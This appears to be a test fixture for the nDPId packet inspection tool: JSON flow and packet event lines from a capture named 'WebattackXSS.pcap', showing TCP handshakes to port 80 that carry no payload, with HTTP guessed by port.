+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1499347437542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347437542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00StAAD4G9KysEAABwKgKMt9gAFCd2mPwah+k3IAQAOXSVgAAAQEICgE6ssUD5IQ6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347440119,"flow_last_seen":1499347440119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347440119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1499347440119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Op5AAD4GizKsEAABwKgKMt96AFDbdo\/XAAAAAKACchBdZwAAAgQFtAQCCAoBOrVJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1499347440120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440120,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ33qAsDTj23aP2KAScSAeDwAAAgQFtAQCCAoD5Ia\/ATq1SQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1499347440120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347440120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Op9AAD4GizmsEAABwKgKMt96AFDbdo\/YgLA05IAQAOW9FQAAAQEICgE6tUoD5Ia\/"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347441364,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347441364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87qpAAD4G1yWsEAABwKgKMt+IAFCFjlgqAAAAAKACchDptwAAAgQFtAQCCAoBOraAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ34gRswTRhY5YK6AScSBIOAAAAgQFtAQCCAoD5If2ATq2gAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":1499347441365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347441365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07qtAAD4G1yysEAABwKgKMt+IAFCFjlgrEbME0oAQAOXnPgAAAQEICgE6toED5If2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347442626,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347442626,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WP9AAD4GbNGsEAABwKgKMt+WAFAR1u9DAAAAAKACchDFDAAAAgQFtAQCCAoBOre8AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ35b747kmEdbvRKAScSCDygAAAgQFtAQCCAoD5IkyATq3vAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":1499347442627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347442627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WQBAAD4GbNisEAABwKgKMt+WAFAR1u9E++O5J4AQAOUi0gAAAQEICgE6t7wD5Iky"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347445158,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445158,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/otAAD4Gx0SsEAABwKgKMt+wAFCaOES+AAAAAKACchDknAAAAgQFtAQCCAoBOro1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ37CiJaNtmjhEv6AScSAQWQAAAgQFtAQCCAoD5IurATq6NQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1499347445159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347445159,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/oxAAD4Gx0usEAABwKgKMt+wAFCaOES\/oiWjboAQAOWvYAAAAQEICgE6ujUD5Iur"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347446419,"flow_last_seen":1499347446419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347446419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1499347446419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oGtAAD4GJWWsEAABwKgKMt++AFBFYxsbAAAAAKACchBhzAAAAgQFtAQCCAoBOrtwAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":2,"flow_last_seen":1499347446420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347446420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ376sLltvRWMbHKAScSDKQgAAAgQFtAQCCAoD5IzmATq7cAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":3,"flow_last_seen":1499347446420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347446420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oGxAAD4GJWysEAABwKgKMt++AFBFYxscrC5bcIAQAOVpSQAAAQEICgE6u3ED5Izm"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347447671,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347447671,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":1,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XZhAAD4GaDisEAABwKgKMt\/MAFDFCOExAAAAAKACchAayQAAAgQFtAQCCAoBOrypAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347447671,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ38yhpTp2xQjhMqAScSCtiAAAAgQFtAQCCAoD5I4fATq8qQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":1499347447671,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347447671,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XZlAAD4GaD+sEAABwKgKMt\/MAFDFCOEyoaU6d4AQAOVMkAAAAQEICgE6vKkD5I4f"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347450180,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347450180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4019,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":1,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82VFAAD4G7H6sEAABwKgKMt\/mAFCGVWZMAAAAAKACchDR0wAAAgQFtAQCCAoBOr8dAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":1499347450180,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347450180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3+bg3FPQhlVmTaAScSAJjwAAAgQFtAQCCAoD5JCSATq\/HQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":1499347450181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347450181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02VJAAD4G7IWsEAABwKgKMt\/mAFCGVWZN4NxT0YAQAOWolgAAAQEICgE6vx0D5JCS"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347451427,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347451427,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":1,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gftAAD4GQ9WsEAABwKgKMt\/0AFCzvkGvAAAAAKACchDHwgAAAgQFtAQCCAoBOsBUAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":1499347451427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347451427,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3\/Qj19JNs75BsKAScSA8zgAAAgQFtAQCCAoD5JHKATrAVAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":1499347451428,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347451428,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gfxAAD4GQ9ysEAABwKgKMt\/0AFCzvkGwI9fSToAQAOXb1QAAAQEICgE6wFQD5JHK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347452731,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347452731,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":1,"flow_last_seen":1499347452731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347452731,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OxxAAD4GirSsEAABwKgKMuACAFCP5\/qGAAAAAKACchAxbgAAAgQFtAQCCAoBOsGaAAAAAAEDAwc="} 
